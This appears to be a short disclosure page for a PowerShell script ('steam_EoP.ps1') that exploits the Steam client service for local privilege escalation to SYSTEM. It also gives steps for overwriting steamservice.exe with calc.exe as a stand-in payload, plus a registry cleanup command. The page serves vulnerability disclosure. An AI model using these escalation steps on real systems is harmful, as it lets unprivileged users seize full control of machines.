steam_EoP.ps1
Command execution as NT_Authority\System
Works without admin privileges
Original credits: https://twitter.com/enigma0x3/status/1159103239729471488
For complete cleanup, at the end:
regln-x64.exe -d HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Valve\Steam\Apps\PrivEsc
You can download from here: https://github.com/tenox7/regln/releases
Additional random info
There is more blatant violation:
- Log on as non-admin on a box with steam
- Do not start steam or any game
cat %system32%\calc.exe > %programfiles%\steam\bin\steamservice.exe- Reboot
- Log on, start steam
- BAM! Now you have calc.exe (attempted to) run as System with highest local privileges
Have you reported this to the vendor or whatever channels are required to get a CVE?